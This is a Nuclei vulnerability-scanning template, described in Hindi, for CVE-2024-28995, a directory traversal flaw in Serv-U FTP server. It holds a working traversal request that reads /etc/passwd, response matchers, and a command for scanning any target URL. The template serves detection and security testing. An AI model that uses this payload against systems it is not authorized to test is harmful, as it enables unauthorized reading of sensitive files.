
Nuclei टेम्पलेट CVE-2024-28995 का पता लगाने के लिए, जो Serv-U FTP सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से फ़ाइल पढ़ने में सक्षम बनाती है।
Serv-U के संस्करण 15.4.2 और उससे नीचे में डायरेक्टरी ट्रैवर्सल भेद्यता की जाँच करता है, जो /etc/passwd जैसी संवेदनशील फ़ाइलों को पढ़ने की अनुमति देता है।
id: CVE-2024-28995
info:
name: Serv-U Directory Traversal Vulnerability
author: Hüseyin TINTAŞ
severity: high
description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
reference:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
tags: pathtraversal,cve,high,serv-u
requests:
- method: GET
path:
- "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"
matchers-condition: and
matchers:
- type: word
words:
- "root:x:"
- "daemon:x:"
- "bin:x:"
part: body
- type: status
status:
- 200
- type: word
words:
- "Server: Serv-U"
part: header
इस टेम्पलेट का Nuclei के साथ उपयोग करने के लिए, टेम्पलेट सामग्री को CVE-2024-28995.yaml नामक फ़ाइल में सहेजें और निम्न कमांड चलाएँ:
nuclei -t CVE-2024-28995.yaml -u <target-url>
<target-url> को उस लक्ष्य के URL से बदलें जिसे आप स्कैन करना चाहते हैं।
किसी भी पूछताछ या अधिक जानकारी के लिए, आप मुझसे इन माध्यमों से संपर्क कर सकते हैं: